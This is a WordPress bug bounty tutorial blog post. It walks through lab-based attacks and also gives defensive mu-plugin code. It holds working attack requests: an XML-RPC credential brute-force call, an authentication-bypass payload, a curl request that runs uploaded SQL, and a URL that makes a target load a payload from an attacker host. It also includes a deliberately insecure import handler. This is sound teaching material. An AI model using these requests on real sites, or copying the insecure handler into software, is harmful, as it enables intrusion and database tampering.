Tuesday, March 25, 2025

WordPress Bug Bounty Guide

Introduction
WordPress is the most popular CMS, powering over 40% of websites. This widespread use makes it a prime target for hackers—and an excellent opportunity for ethical hackers and bug bounty hunters. Companies and website owners rely on security researchers to find and report vulnerabilities before malicious attackers exploit them.

If you’re new to bug hunting and want to explore WordPress security the right way, this guide will help you get started. We’ll cover essential tools, common vulnerabilities, and best practices for reporting security flaws. Whether you’re looking to sharpen your cybersecurity skills or earn rewards through bug bounty programs, this guide is your roadmap to success.

Setting up the WordPress Pentesting Lab

Before diving into real scenarios, it is better to practise on a test environment to avoid any legal issues. Use Damn Vulnerable WordPress (DVWP), a playground for practising WordPress hacking and wpscan testing. It includes many vulnerabilities, which we are going to explore in this guide.

Installing DVWP with Docker
Use the following commands to set up DVWP on your local machine.

$ git clone https://github.com/vavkamil/dvwp.git
$ cd dvwp/
$ docker-compose up -d --build
$ docker-compose run --rm wp-cli install-wp
$ docker-compose up -d

WP-JSON User Enumeration

WordPress exposes user data through the REST API, which can be abused for user enumeration. Attackers can retrieve usernames from the endpoints below; try either path to check.

/wp-json/wp/v2/users/
?rest_route=/wp/v2/users

If user enumeration is possible, this API lists usernames as shown below, which can then be used in brute-force attacks.


HackerOne report: https://hackerone.com/reports/1735586
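From the defender's side, the fix is to stop handing the user list to anonymous callers. The must-use plugin below is an added example written for this guide, not code from DVWP, WordPress core or the report above; the plugin header and the "logged-in visitors only" policy are assumptions. It removes every /wp/v2/users route for logged-out requests, so both URL forms shown above (the /wp-json/ path and the ?rest_route= query form) return a rest_no_route error instead of a user list.

```php
<?php
/**
 * Plugin Name: Example - hide REST user routes from anonymous visitors
 * Added example for this guide; copy into wp-content/mu-plugins/ to activate.
 */

add_filter( 'rest_endpoints', function ( array $endpoints ) {
    // Authenticated requests (cookie + REST nonce, or application passwords)
    // keep the full route table, so the block editor and user admin keep working.
    if ( is_user_logged_in() ) {
        return $endpoints;
    }

    // Anonymous requests: drop /wp/v2/users, /wp/v2/users/(?P<id>[\d]+), /wp/v2/users/me.
    // The route table is shared by /wp-json/... and ?rest_route=..., so one filter
    // covers both URL forms.
    foreach ( array_keys( $endpoints ) as $route ) {
        if ( 0 === strpos( $route, '/wp/v2/users' ) ) {
            unset( $endpoints[ $route ] );
        }
    }
    return $endpoints;
} );
```

Two caveats when testing this: a logged-in browser that calls the endpoint directly without the REST nonce is treated as anonymous by core, so it will also see the 404; and this only closes the REST route, the author archive (/?author=N) still reveals the author slug unless it is handled separately.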

XML-RPC Issues

XML-RPC is a remote procedure call (RPC) protocol used in WordPress. If enabled, it can lead to multiple vulnerabilities, including:

Brute Force Attacks: Attackers can test multiple passwords using a single request.
Pingback Exploitation: The XML-RPC pingback feature can be used for DDoS attacks.

Check whether the xmlrpc.php file is reachable.


To determine whether xmlrpc.php is enabled, send the request below from the Repeater tab in Burp.

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

The method below can be used to brute-force user credentials.

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

HackerOne report: https://hackerone.com/reports/1619536
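The two issues in this section (password guessing through wp.getUsersBlogs and pingback reflection) can be closed from inside WordPress. The must-use plugin below is an added example for this guide, not code from DVWP, WordPress core or the report; the plugin header is an assumption. The method names it removes are the ones WordPress registers in its XML-RPC server.

```php
<?php
/**
 * Plugin Name: Example - reduce XML-RPC exposure
 * Added example for this guide; copy into wp-content/mu-plugins/ to activate.
 */

// 1. Refuse every method that requires a login (wp.getUsersBlogs included):
//    the credential-guessing request above now gets fault 405 "XML-RPC services
//    are disabled on this site" before any password is checked.
//    Caveat: this filter only covers methods that log in; xmlrpc.php still answers
//    system.listMethods and pingback.ping, hence the two filters below.
add_filter( 'xmlrpc_enabled', '__return_false' );

// 2. Remove the pingback methods (used for DDoS reflection) and system.multicall
//    (which lets a single request carry many login attempts) from the method table
//    that system.listMethods advertises.
add_filter( 'xmlrpc_methods', function ( array $methods ) {
    unset(
        $methods['pingback.ping'],
        $methods['pingback.extensions.getPingbacks'],
        $methods['system.multicall']
    );
    return $methods;
} );

// 3. Stop advertising the endpoint in the X-Pingback response header on posts.
add_filter( 'wp_headers', function ( array $headers ) {
    unset( $headers['X-Pingback'] );
    return $headers;
} );
```

If the site relies on XML-RPC (Jetpack, the mobile apps), keep only filters 2 and 3 so logins still work; if it does not, the complete fix is to deny /xmlrpc.php at the web server, which the page's system.listMethods probe will then confirm with a 403 instead of a method list.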

Directory Listing & Sensitive Data Exposure

Many websites expose sensitive files due to improper directory permissions. Use tools like dirsearch or ffuf for directory fuzzing, or Google dorks, to find sensitive data.

site:example.com filetype:sql
site:example.com inurl:adminer.php
ffuf -u http://127.0.0.1:31337/FUZZ -mc 200 -w ~/wordlist/common.txt

Common files that should not be publicly accessible include the following, which you can explore in the DVWP lab.

  • info.php – PHP configuration details
  • dump.sql – Database dump
  • adminer.php – Web-based database management tool
  • php.ini – PHP configuration file
  • cgi-bin/ – Common script directory
  • .git/logs/ – Git repository logs

Vulnerable WordPress Plugins & Exploits

WPScan is a powerful security scanner for WordPress that identifies vulnerable plugins and themes and enumerates users. Register at wpscan (https://wpscan.com/register/) and use the API key during the scan.

wpscan --url http://172.17.0.1:31337/ --enumerate p --api-token <token-value>

Many WordPress vulnerabilities arise from outdated or poorly coded plugins. Here are some notable vulnerabilities and their exploits:

InfiniteWP Client < 1.9.4.5

  • Vulnerability: Authentication Bypass (CVE-2020-8772)
  • Description: The InfiniteWP Client plugin allows administrators to manage multiple WordPress sites from a central dashboard. A logical flaw allows attackers to bypass authentication using a specially crafted request.
  • Exploitation:

Encode the payload below in Base64 using the encoder.

{"iwp_action":"add_site","params":{"username":"admin"}}

Send the crafted request, changing the request method to POST.

_IWP_JSON_PREFIX_base64-encoded-payload

Check the response in the browser, then refresh the page and check the result.

Try manual exploit – https://www.exploit-db.com/exploits/47939 or use Metasploit Framework.

WP Advanced Search < 3.3.4

  • Vulnerability: Unauthenticated Database Access & Remote Code Execution
  • Description: The WP Advanced Search plugin allows users to create advanced search queries. Older versions expose a database endpoint that allows unauthenticated users to query the WordPress database.
  • Exploitation:

Send the crafted request with the curl command below.

curl -i -s -k -X 'POST' \
  -H 'Host: 172.17.0.1:31337' -H 'User-Agent: Mozilla/5.0' \
  -H 'Accept: text/html' -H 'Content-Type: multipart/form-data; boundary=----boundary' \
  --data-binary $'------boundary\r\nContent-Disposition: form-data; name="wp_advanced_search_file_import"; filename="test.sql"\r\nContent-Type: application/sql\r\n\r\nupdate wp_users set display_name="Pentestguy" where id = 1;\r\n------boundary--\r\n' \
  'http://172.17.0.1:31337/wp-admin/admin-post.php?action=db_import'

After executing the crafted request, verify the changed username, and try further attacks such as remote code execution.


Reference: https://wpscan.com/vulnerability/f0573253-9dd4-4c73-aa2e-867c9caae0dc/
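Both plugin issues so far share one root cause: a privileged action reachable without a real authorization check (InfiniteWP trusted a username supplied in the request body; WP Advanced Search ran an uploaded SQL file from an admin-post handler that anonymous visitors could hit). The code below is a constructed example for this guide that shows that shape next to a hardened handler. It is not the code of either plugin; the hook name db_import is taken from the curl request above, while the import_file field, the nonce action and the function names are assumptions.

```php
<?php
/**
 * Constructed example: an admin-post "database import" action, insecure shape vs hardened.
 * Not the WP Advanced Search plugin's code.
 */

// INSECURE SHAPE. admin_post_nopriv_{action} fires for visitors who are NOT logged in,
// so the curl request in this section reaches the handler with no session, no
// capability check and no nonce, and the uploaded file is executed as SQL.
add_action( 'admin_post_nopriv_db_import', 'example_db_import_insecure' );
function example_db_import_insecure() {
    global $wpdb;
    $sql = file_get_contents( $_FILES['wp_advanced_search_file_import']['tmp_name'] );
    $wpdb->query( $sql ); // attacker-controlled statement, run with the site's DB credentials
}

// HARDENED VERSION: only the authenticated hook (no _nopriv_ variant), plus four checks.
add_action( 'admin_post_db_import', 'example_db_import_secure' );
function example_db_import_secure() {
    // 1. Authorization: the caller must hold an administrator capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 2. CSRF: the submitting form must contain wp_nonce_field( 'example_db_import' );
    //    check_admin_referer() calls wp_die() itself when the nonce is missing or stale.
    check_admin_referer( 'example_db_import' );

    // 3. Upload validation: a genuine upload, bounded size, .sql extension.
    $file = isset( $_FILES['import_file'] ) ? $_FILES['import_file'] : null;
    if ( ! $file || UPLOAD_ERR_OK !== $file['error'] || ! is_uploaded_file( $file['tmp_name'] ) ) {
        wp_die( 'No valid upload.', '', array( 'response' => 400 ) );
    }
    if ( $file['size'] > 5 * MB_IN_BYTES ) {
        wp_die( 'Import file too large.', '', array( 'response' => 413 ) );
    }
    $type = wp_check_filetype( $file['name'], array( 'sql' => 'application/sql' ) );
    if ( 'sql' !== $type['ext'] ) {
        wp_die( 'Only .sql files are accepted.', '', array( 'response' => 400 ) );
    }

    // 4. Audit trail before anything runs: who, from where, which file.
    error_log( sprintf(
        'db_import by user %d from %s: %s (%d bytes)',
        get_current_user_id(),
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown',
        sanitize_file_name( $file['name'] ),
        (int) $file['size']
    ) );

    // Importing SQL is an administrator-only power by design; $wpdb->query() runs one
    // statement per call, so split on statement terminators rather than passing the file whole.
    global $wpdb;
    $statements = array_filter( array_map( 'trim', explode( ";\n", file_get_contents( $file['tmp_name'] ) ) ) );
    foreach ( $statements as $statement ) {
        $wpdb->query( $statement );
    }

    wp_safe_redirect( add_query_arg( 'imported', count( $statements ), admin_url( 'tools.php' ) ) );
    exit;
}
```

When reviewing a plugin, the quick check is therefore: for every admin_post_nopriv_ and wp_ajax_nopriv_ hook, ask whether the handler really must be anonymous, and for every privileged handler, look for the current_user_can() and check_admin_referer()/wp_verify_nonce() pair before any state changes.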

Social Warfare <= 3.5.2

  • Vulnerability: Unauthenticated Arbitrary Settings Update (CVE-2019-9978)
  • Description: This vulnerability allows an unauthenticated attacker to modify WordPress settings, potentially redirecting users to malicious sites.
  • Exploitation:

Create payload.txt containing the code below.

Host it on a server reachable from the targeted website.

python3 -m http.server

Visit http://TARGET/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt


Reference: https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618/
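The dangerous pattern here is a debug or "load settings" feature that takes a URL from an unauthenticated request, fetches it, and trusts the body. The handler below is a constructed example for this guide of how such a feature can be written safely; it is not Social Warfare's code, and the action name, option keys, the allowlisted host options.example.com and the function name are assumptions.

```php
<?php
/**
 * Constructed example: a hardened "load options from a remote URL" admin action.
 * Not the Social Warfare plugin's code.
 */

// Only the authenticated hook: no admin_post_nopriv_ variant, so anonymous visitors
// never reach this code (the swp_debug/swp_url request above relied on the opposite).
add_action( 'admin_post_example_load_options', 'example_load_options_from_url' );

function example_load_options_from_url() {
    // Authorization and CSRF, as for any settings change.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'example_load_options' );

    // The URL is not free-form: https only, and the host must be on a fixed allowlist.
    $url  = isset( $_POST['options_url'] )
        ? esc_url_raw( wp_unslash( $_POST['options_url'] ), array( 'https' ) )
        : '';
    $host = wp_parse_url( $url, PHP_URL_HOST );
    $allowed_hosts = array( 'options.example.com' ); // assumption: the vendor's own host
    if ( '' === $url || ! in_array( $host, $allowed_hosts, true ) ) {
        wp_die( 'URL not permitted.', '', array( 'response' => 400 ) );
    }

    // wp_safe_remote_get() sets reject_unsafe_urls, which refuses loopback and
    // private-range addresses; redirects are disabled so the allowlist cannot be bypassed.
    $response = wp_safe_remote_get( $url, array( 'timeout' => 5, 'redirection' => 0 ) );
    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        wp_die( 'Could not fetch options.', '', array( 'response' => 502 ) );
    }

    // The body is data, never code: decode it as JSON and never include() or eval() it.
    $data = json_decode( wp_remote_retrieve_body( $response ), true );
    if ( ! is_array( $data ) ) {
        wp_die( 'Malformed options document.', '', array( 'response' => 400 ) );
    }

    // Only known keys survive, each through its own sanitizer; a redirect target
    // is validated as a URL so a remote file cannot plant an arbitrary string there.
    $schema = array(
        'share_label'    => 'sanitize_text_field',
        'twitter_handle' => 'sanitize_text_field',
        'redirect_url'   => 'esc_url_raw',
    );
    $clean = array();
    foreach ( $schema as $key => $sanitizer ) {
        if ( isset( $data[ $key ] ) && is_scalar( $data[ $key ] ) ) {
            $clean[ $key ] = call_user_func( $sanitizer, (string) $data[ $key ] );
        }
    }

    update_option( 'example_plugin_options', $clean );
    wp_safe_redirect( add_query_arg( 'updated', '1', admin_url( 'options-general.php?page=example' ) ) );
    exit;
}
```

The order of the checks matters: authorization and the nonce come first, so an attacker cannot even trigger outbound requests from the server, and the host allowlist is enforced before the fetch rather than on the response.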

Conclusion

This guide covered essential WordPress security testing techniques, including setting up a vulnerable test environment, exploiting common vulnerabilities, and using security tools like WPScan. Always ensure ethical hacking practices by testing only in authorized environments.

If you found this guide helpful, share it with your peers and leave a comment with your thoughts or suggestions. Want to collaborate with us? Visit our collaboration page to learn more. Thank you for reading!

Shubham Nagdive, https://www.pentestguy.in
Shubham Nagdive is the founder of Pentestguy. He works as a Penetration Tester and Infosec Speaker, and loves to explore Cyber Security and Ethical Hacking.